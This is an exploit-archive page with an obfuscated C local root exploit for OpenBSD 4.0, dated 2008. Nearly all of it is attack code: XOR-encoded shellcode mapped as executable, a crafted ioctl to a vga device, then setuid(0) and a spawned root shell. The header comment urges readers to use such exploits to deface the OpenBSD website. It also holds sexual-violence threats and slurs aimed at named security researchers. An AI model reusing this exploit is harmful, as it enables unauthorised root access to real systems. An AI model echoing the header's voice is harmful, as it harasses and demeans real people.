[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OpenBSD 4.0 (FIRST ANIMATED EXPLOIT) Local Root Exploit (vga)
# Published : 2008-07-01
# Author : lul-disclosure inc.
# Previous Title : Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC
# Next Title : XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC
/*
* [ A PRODUCTION OF LUL-DISLCOSURE INC. ]
* PROUDLY PRESENTS...
*
* 888 888
* 888 888
* 888 888
* .d88b. 88888b. .d88b. 88888b. 88888b. .d8888b .d88888
* d88""88b 888 "88b d8P Y8b 888 "88b 888 "88b 88K d88" 888
* 888 888 888 888 88888888 888 888 888 888 "Y8888b. 888 888
* Y88..88P 888 d88P Y8b. 888 888 888 d88P X88 Y88b 888
* "Y88P" 88888P" "Y8888 888 888 88888P" 88888P' "Y88888
* 888
* 888
* 888 DID YOU EVER FEEL THE RUSH...
* d8b d8b ...FOR JIZZ?
* Y8P Y8P
*
* 8888 888 88888888 88888888
* "888 888 d88P d88P
* 888 888 d88P d88P
* 888 888 d88P d88P
* 888 888 88888888 88888888
* 888
* d88P
* 888P"
*
* My final contribution, DA WORLD'S FIRST ANIMATED EXPLOIT!, is the foundation
* for the next generation of OpenBSD exploits, crafted to burn Theo's eyes and make
* him spend countless hours not only exercising his supreme reversing skills
* but also delay his already deadly slow patch release timing. Hopefully every
* fucktard out there willing to release an exploit for one of the many OpenBSD
* locally exploitable issues, will give this insanely advanced code a good use.
* Make sure you include some sanity checks (ie. if uid == 0 and hostname ==
* cvs.openbsd.org make it do something creative like updating their index.html
* once in a while).
*
* I would like to thank the following people for all the support, fun and
* inspiration during my pilgrimage through the incredibly broken community known
* as the security industry:
* Jesus H. Christ, Brute Dong, Bob, GOBBLES, towlie, noir and spender.
*
* I could name several people that I would love to either curbstomp or rape
* anally (enjoying every inch of their rectum, though many of them would enjoy
* the experience too, i know you dig dicks guys!), but I'll be a nice kid and
* simply say that I love how this hdm, jf, FAilja, et al are nothing but
* cock monglers. I enjoy how some of them have lost their jobs or got banned
* by US immigration. And I also thank McDonalds for making you fatfucks get more
* obese and ugly every year. And I'm sorry for the poor strippers that have to
* stand the reality of being the only thing ressembling a woman you've ever had
* the opportunity to see naked, besides your crack head cock-gobbling mom when
* she sodomized you with a chop stick (and we know you liked it).
* Hehehehe. BANANA! BANANA! BANANA! BTW, has gadi evron stopped crying for cocks
* on craigslist men seeking men board? That fat fuck is sick. LULZ!
*
* OpenBSD is obsolete, aged, poorly designed, worsly developed and horribly
* maintained. And led by a guy who needs to take his head out of his frozen
* Canadian ass. FUCK YOU THEO, I'VE GOT YOUR DARPA FUNDING!
*
* This exploit abuses an old bug to gain root privileges on an OpenBSD 4.0
* system. The ipv6 bug was never fully implemented because this shit made
* me get a brain tumor. FUCK YOU THEO! LULZ LULZ LULZ LULZ LULZ LULZ LULZ
*
* -- 2008 - by LMH
*
*/
#include /*pax*/<string.h>/*drepper libc rocking on*//**//**//**//**//**//* */
#include /*It seems to me so strange*/<stdlib.h>/*tax*//**//**//**//**//**//* */
#include /*aint*/<stdio.h>/*mmap NULL rocking the kernel on*//**//**//**//**//**/
#include /*Check wallet for her name*/<unistd.h>/*lax!*//**//**//**//**//**//**/
#include /*Her face is in the muck*/<sys/param.h>/**//**//**//**//**//**//* * */
#include /*Her face is in the muck*/<err.h>/**//**//**//**//**//**//**//**//* */
#include /*I think her zippers stuck*/<sys/ioctl.h>/*death OPENBSD SECURE */
#include /*It is perfect for me*/<sys/syscall.h>/*threats THANKS TO PAX */
#include /*To practice surgery*/<fcntl.h>/**//**//* ######### BUY */
#include /*One look coagulates*/<sys/types.h>/*mail ##horror## ### SPENDER */
#include /*Its time to operate*/<sys/stat.h>/*arrives #sick### ### A NEW */
#include /*Just keep it going*/<sys/mman.h>/*pain ###pain##### ### POSTER! */
#include /*Just keep it going*/<sys/sysctl.h>/*feels ##dumb### ############*/
#define /*Just keep it going*/ma main/*theo: ##feels########## ance M #######*/
#define /*Shes not dead, shes gonna live*/s /*fuck*/stdout/*## Havok #######*/
#define /*Shes not dead, shes gonna live*/x fflush/*the ######################*/
#define /*I see her eyes rolling back in her head*/_s /*pain*/sleep/* GG NOIR */
#define /*Come on lets take her home*/f for/**//**//**//**//**//**//**//**//* */
#define /*I think i heard her groan*/v /*what*/void/**//**//**//**//**//**//* */
#define /*Hold on or she will sink*/__0 while/**//**//**//**//**//**//**//* */
#define /*Just keep it going*/_c /*is*/char/*acter issues*//**//**//**//**//* */
#define /*You can fake it*/_____ sizeof/**//**//**//**//**//**//* *//**//* */
#define /*It's time to operate*/____ /*the*/printf/**//**//**//**//**//**//* */
#define /*It's time to operate*/___ return/**//**//**//**//**//**//* *//**//**/
#define /*It's time to operate*/__ /*of*/int/**//**//**//**//**//**//**//**//**/
#define /*It's time to operate*/_t static/**//**//**//**//**//**//**//**//* */
#define /*It's time to operate*/_ki struct kinfo_proc/**//**//**//**//**//* */
#define /*It's time to operate*/_pi pid_t/**//**//**//**//**//**//* *//**//**/
#define /*It's time to operate*/______ unsigned int/**//**//**//**//**//**//* */
#define /*It's time to operate*/_______ err/**//**//**//**//**//**//* *//* */
#define /*It's time to operate*/__ki exit/**//**//**//**//**//**//* *//**//* */
#define /*It's time to operate*/__sy sysctl/**//**//**//**//**//**//* *//* */
#define /*Heroin winner cup.*/ctkrn (__)0x00000000/**//**//**//**//**//**//* */
#define /*It's time to operate*/kproc (__)0x0000000E/**//**//**//**//**//**//**/
#define /*Inject. Overdose. End.*/kppid (__)(/**/ctkrn+/**/0x00000001)/**//* */
#define /*That cigar tube smells like lost elections*/dirtysanchez mmap/**//* */
#define /*It's time to operate*/________/**/printf/**//**//**//**//**//**//* */
#define /*It's time to operate*/_________/**/unsigned long/**//**//**//**//* */
#define /*It's time to operate*/_m/**/memcpy/**//**//**//**//**//**//**//* */
#define /*It's time to operate*/__________/**/setuid/**//**//**//**//**//**//**/
#define /*It's time to operate*/___________/**/seteuid/**//**//**//**//**//* */
#define /*It's time to operate*/____________/**/execl/**//**//**//**//**//* */
#define aaaaaaaaaaaaaaaa O_RDWR
#define ____rw_c_ (aaaaaaaaaaaaaaaa|O_CREAT)
#define ____se_e_ (S_IRUSR|S_IWUSR)
#define reopen close
#define _w_w_w_w_w_w_w_w write
#define meltwax PROT_READ|PROT_EXEC
#define raadt MAP_FIXED
#define openbsdsec MAP_FAILED
#define molest syscall
#define provos SYS_ioctl
_c macaddr[]=""; // Used for ICMPv6 exploit: VMWare network interface mac addr
/* many years... *Theo sheds a FREE tear* Sigh.
===================================================================
RCS file: /usr/OpenBSD/cvs/www/index.html,v
retrieving revision 1.548
retrieving revision 1.549
diff -u -r1.548 -r1.549
--- www/index.html 2007/03/12 17:21:59 1.548
+++ www/index.html 2007/03/13 22:39:47 1.549
@@ -78,7 +78,7 @@
<a href="art1.html"><img border="0" src="images/puffy40.gif" height=199
<br>
<center><strong><font color="#e00000">
-Only one remote hole in the default install, in more than 10 years!<br>
+Only two remote holes in the default install, in more than 10 years!<br>
</font></strong></center>
<p>
The OpenBSD project produces a <b>FREE</b>, multi-platform 4.4BSD-based
*/
_c shlr[]="xc9xd1xd1xd1xc9xd1xd1xd1xc9xd1xd1xd1xc9xd1xd1xd1xc9"
"xd1xd1xd1xc9xd1xd1xd1x39xdexd1xd1xd1xa9x87xe5xc3x2fx1bx7c"//
"x0fx7cx0fx3ex6fx41x41x41x8ex5axdex5ax88xc1xe0x11x58x92xd5"//
"x5axc2x58x93xd5x69x80x96x99x01x2ex31xd1"; double obsdv;_________//
mg1=0x21524110;_________ mg2=0xcc99e897;_________ mg3=0xffffffff;_________ mg4=
0x12345678;_c shl[]="x85xc8xc3xc4x85xd9xc2xaa";v gpr(_pi dp,_ki *kp);///
_c tks[]="x6ex35x2cx31x6ex35x29x24x2ex6fx19x19x19x19x19x41";_c
gde[]="x00x4bx4ax59x00x5bx5bx56x6cx1fx2f";
_t v evi(){_________ rts[2]={0xee5f9be,0xebdfc46};__ i,moo,moooo;v *p;_________
ppa;_ki kp;rts[0]=rts[0]^(mg1^mg3);rts[1]=rts[1]^(mg2^mg4);gpr((_pi)getpid(),//
&kp);ppa=(_________)kp.kp_eproc.e_paddr;shlr[24+5]=ppa&0xff;shlr[24+6]=(ppa>>8)&
0xff;shlr[24+7]=(ppa>>16)&0xff;shlr[24+8]=(ppa>>24)&0xff;____("x5bx2bx5dx20"
"x53x68x65x6cx6cx63x6fx64x65x3ax20""%u bytes at %px0a",(unsigned)//
_____(shlr),&shlr);moo=mkstemp(tks);if(moo<0){_______(1,"x6fx70x65x6e");}
_w_w_w_w_w_w_w_w(moo,shlr,_____(shlr));if((lseek(moo,0L,SEEK_SET))<0){_______(1,
"x6cx73x65x65x6b");}p=dirtysanchez(0,_____(shlr),meltwax,raadt,moo,0);if(p
==openbsdsec){_______(1,"x6dx6dx61x70");}moooo=open(gde,O_RDWR);if(moooo<0){
munmap(p,_____(shlr));reopen(moo);_______(1,"x6fx70x65x6e");}molest(provos,
moooo,0x80044103,NULL);reopen(moooo);reopen(moo);___________(0);__________(ctkrn);
____________(shl,"sh",(v *)ctkrn);
}
double vobsd(){__ rg[2],l;_c *p;double re;rg[0]=CTL_KERN;rg[1]=KERN_OSRELEASE;
if(__sy(rg,2,NULL,(size_t *)&l,NULL,0)==-1){_______(1,"x73x79x73x63x74x6c"
);}if((p=malloc(l))==NULL){_______(1,NULL);}if(__sy(rg,2,p,(size_t *)&l,NULL,0)
==-1){_______(1,"x73x79x73x63x74x6c");}re=atof(p);____("x5bx2bx5dx20"
"x4fx70x65x6ex42x53x44x20x72x65x6cx65x61x73x65x20x64x65x74"
"x65x63x74x65x64x3ax20""%s (%f)n",p,re);free(p);___ re;}v uss(){____(/**/
"x4fx70x65x6ex42x53x44x3ax20x4fx6ex6cx79x20x73x65x63x75x72x65"
"x20x69x6ex20x73x69x6ex67x6cx65x20x75x73x65x72x20x65x6ex76x69"
"x72x6fx6ex6dx65x6ex74x73x20x66x6fx72x20x6dx6fx72x65x20x74x68"
"x61x6ex20x31x30x20x79x65x61x72x73x21x0ax0ax54x61x72x67x65x74"
"x20x76x75x6cx6ex65x72x61x62x69x6cx69x74x79x3ax0ax09x76x67x61"
"x3ax20x76x67x61x5fx69x6fx63x74x6cx28x29x20x6cx6fx63x61x6cx20"
"x65x78x70x6cx6fx69x74x20x20x20x28x34x2ex30x20x61x6ex64x20x33"
"x2ex39x20x67x65x6ex65x72x69x63x20x69x33x38x36x29x0ax09x69x70"
"x36x34x30x3ax20x49x43x4dx50x76x36x20x72x65x6dx6fx74x65x20x65"
"x78x70x6cx6fx69x74x20x20x20x20x20x28x34x2ex30x20x67x65x6ex65"
"x72x69x63x20x69x33x38x36x29x20x28x72x6fx6fx74x20x72x65x71x75"
"x69x72x65x64x21x29x0ax0ax44x61x72x65x20x79x6fx75x20x74x6fx20"
"x72x75x6ex20x74x68x69x73x20x65x78x70x6cx6fx69x74x20x61x73x20"
"x72x6fx6fx74x2ex20x4fx70x65x6ex42x53x0ax0a");__ki(-1);}v gpr(_pi dp,
_ki *kp){__ rg[4],l;rg[0]=ctkrn;rg[1]=kproc;rg[2]=kppid;rg[3]=dp;l=_____(_ki);if(
__sy(rg,4,kp,(size_t *)&l,NULL,0)<0){_______(1,"x73x79x73x63x74x6c");_______
(1,"x43x6fx75x6cx64x20x6ex6fx74x20x72x65x74x72x69x65x76x65x20"
"x70x72x6fx63x20x73x74x72x75x63x74x75x72x65x21x0a");}}_t v xo(_c
u[],______ l,__ k){______ i;f(i=0;i<l;i++){u[i]=u[i]^k;}}_t __ was=0;v pg(__ w,_c
*rr[],__ nz,__ wsn){__ i,b;_c *u=0;__0(was<wsn){f(i= 0;i<nz;i++){u=rr[i];f(b=0;b
<w;b++){____("b");}____("%s",u);x(s);_s(1);}was++;}____("n"/*A*/);/*{*/}/*r},v
*/__ ma(__ a,_c **g){_c *theosmovie[]={"x53x75x63x6bx69x6ex67"/**//**//**/
"x20x6fx6ex20x6dx79x20x74x69x74x74x69x65x73x20x6cx69x6bx65x20"
"x79x6fx75x20x77x61x6ex74x65x64x20x6dx65x20x20x20x20x20x20x20"
"x20x20x20x20","x43x61x6cx6cx69x6ex67x20x6dx65x2cx20x61x6cx6c"
"x20x74x68x65x20x74x69x6dx65x20x6cx69x6bx65x20x42x6cx6fx6ex64"
"x69x65x20x20x20x20x20x20x20x20x20x20x20x20x20x20","x43x68x65"
"x63x6bx20x6fx75x74x20x6dx79x20x63x68x72x69x73x73x79x20x62x65"
"x68x69x6ex64x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20","x49x74x27x73x20x66x69x6ex65x20x61"
"x6cx6cx20x6fx66x20x74x68x65x20x74x69x6dx65x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
,"x4cx69x6bx65x20x73x65x78x20x6fx6ex20x74x68x65x20x62x65x61x63"
"x68x65x73x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20","x57x68x61x74x20x65x6cx73"
"x65x20x69x73x20x69x6ex20x74x68x65x20x74x65x61x63x68x65x73x20"
"x6fx66x20x70x65x61x63x68x65x73x3fx20x48x75x68x3fx20x57x68x61"
"x74x3fx20","x48x75x68x3fx20x52x69x67x68x74x2ex20x57x68x61x74"
"x3fx20x55x68x68x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20","x48x75x68x3f"
"x20x52x69x67x68x74x2ex20x57x68x61x74x3fx20x55x68x68x3fx20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20","x53x49x53x20x49x55x44x2cx20x73x74x61"
"x79x20x69x6ex20x73x63x68x6fx6fx6cx20x27x63x61x75x73x65x20x69"
"x74x27x73x20x74x68x65x20x62x65x73x74x20x20x20x20x20x20x20",
"x49x55x44x20x53x49x53x2cx20x73x74x61x79x20x69x6ex20x73x63x68"
"x6fx6fx6cx20x27x63x61x75x73x65x20x69x74x27x73x20x74x68x65x20"
"x62x65x73x74x20x20x20x20x20x20x20","x53x49x53x20x49x55x44x2c"
"x20x73x74x61x79x20x69x6ex20x73x63x68x6fx6fx6cx20x27x63x61x75"
"x73x65x20x69x74x27x73x20x74x68x65x20x62x65x73x74x20x20x20x20"
"x20x20x20","Fuck the pain away? Fuck the pain away!x20x20x20x20x20x20"
"x20x20x20x20x20x20","Fuck the pain away! Fuck the pain away?x20x20x20"
"x20x20x20x20x20x20x20x20x20","Fuck the 0day away. Fuck the pain away!"
"x20x20x20x20x20x20x20x20x20x20x20x20","Fuck the pain away! Fuck the"
" pain away?x20x20x20x20x20x20x20x20x20x20x20x20","Fuck the 0day aw"
"ay? Fuck the pain away!x20x20x20x20x20x20x20x20x20x20x20x20"};____(
"�33[2Jx20x20x5fx5fx5fx20x20x20x20x20x20x20x4fx70x65x6ex42x53"
"x44x20x4dx6fx76x69x65x20x62x79x20x54x68x65x6fx20x64x65x20x52"
"x61x61x64x74x0ax20x2fx2fx20x20x37x20x20x20x20x20x20x53x74x61"
"x72x72x69x6ex67x2ex2ex2ex0ax28x5fx2cx5fx2fx5cx20x20x20x20x20"
"x20x20x20x20x20x20x20x20x2ex2ex2ex68x69x6dx73x65x6cx66x21x0a"
"x20x5cx20x20x20x20x5cx0ax20x20x5cx20x20x20x20x5cx20x20x20x20"
"x20x42x72x6fx75x67x68x74x20x74x6fx20x79x6fx75x20x62x79x2ex2e"
"x2ex0ax20x20x5fx5cx20x20x20x20x5cx5fx5fx0ax20x28x20x20x5cx20"
"x20x20x20x20x20x29x20x20x20x20x20x54x68x65x6fx27x73x20x6cx6f"
"x73x74x20x44x41x52x50x41x20x66x75x6ex64x69x6ex67x0ax20x20x5c"
"x5fx5fx5fx5cx5fx5fx5fx2fx20x20x20x20x20x20x20x20x20x20x20x26"
"x20x50x65x61x63x68x65x73x2ex0ax0a");/* Fuck the 0day away. */ if(a<2
){uss();}obsdv=vobsd();pg(80,theosmovie,_____(theosmovie)/_____(_c *),1);xo(shl,
_____(shl),shl[_____(shl)]);xo(shlr,_____(shlr),0xd1);xo(tks,_____(tks),0x41);xo(
gde,_____(gde), 0x2f);if(obsdv==4.0&&!strcmp(g[1],"vga")){evi();}
/*That's it.*/___ 0;}/*Easy to fingerprint, eh?*/
// www.Syue.com [2008-07-01]